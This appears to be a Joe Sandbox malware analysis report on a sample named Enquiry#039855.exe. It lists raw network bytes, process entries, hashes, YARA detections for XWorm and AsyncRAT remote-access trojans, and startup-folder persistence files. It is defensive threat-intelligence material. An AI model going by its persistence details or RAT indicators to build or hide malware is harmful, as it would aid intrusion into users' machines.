Mar 1, 2025 14:42:22.754816055 CET	1236	IN	Data Raw: 76 a9 3a be 70 a5 15 0b 65 9d 61 73 28 3d 97 f4 b5 82 13 70 e8 00 05 89 64 38 3e 2b 1c 5a a5 b3 ad 24 72 43 14 16 85 f7 e4 26 2b 52 72 36 40 c6 e6 60 7d 25 2c a1 97 7f f1 48 fa 59 c3 97 8f dd 68 a8 ff 04 02 7a 91 f7 a2 2e bd 60 91 c3 2b 48 10 77 Data Ascii: v:peas(=pd8>+Z$rC&+Rr6@`}%,HYhz.`+Hwi(POD"W\|g=~WarQ7p9s_iAI3)uq>{.R +-:ZeLDy%%.WI=u]rl>OTuqi.%rZL&t0J
Mar 1, 2025 14:42:22.759738922 CET	1236	IN	Data Raw: 18 b0 12 23 ab fb bb 71 03 49 cc 23 2a aa 2d fe 13 a8 23 3e 3a 2a 19 54 23 4c e9 61 7a 0e c6 ad 00 2d 6a 5a 6f e8 49 a6 5f 30 28 43 b2 2e 7b 4c ed d4 13 77 90 62 2c 16 ab 79 a4 ab b3 f2 9f 4b 73 88 d6 10 31 79 d3 5d 28 42 6c 7d 77 44 97 9b f1 69 Data Ascii: #qI#-#>:T#Laz-jZoI_0(C.{Lwb,yKs1y](Bl}wDipr}i6YA+Mao]y?7;->t=e!rhF;;1csckGekP:Oq^HWvmgQdXCiV

Target ID:	0
Start time:	08:42:20
Start date:	01/03/2025
Path:	C:\Users\user\Desktop\Enquiry#039855.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Enquiry#039855.exe"
Imagebase:	0x9a0000
File size:	10'752 bytes
MD5 hash:	A69AD9D0FB5BDF7EA93DBFCA99495D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1802060515.0000000005F90000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1793313944.00000000030BF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1793313944.00000000030BF000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1793313944.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1793313944.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1793313944.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	08:42:54
Start date:	01/03/2025
Path:	C:\Users\user\Desktop\Enquiry#039855.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Enquiry#039855.exe"
Imagebase:	0x40000
File size:	10'752 bytes
MD5 hash:	A69AD9D0FB5BDF7EA93DBFCA99495D80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000002.2693820397.0000000000412000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000002.2693820397.0000000000412000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	08:42:58
Start date:	01/03/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 920
Imagebase:	0x5c0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Enquiry#039855.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sign.vbs

C:\Users\user\AppData\Roaming\Sign.exe

C:\Users\user\AppData\Roaming\Sign.exe:Zone.Identifier

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Windows Analysis Report
Enquiry#039855.exe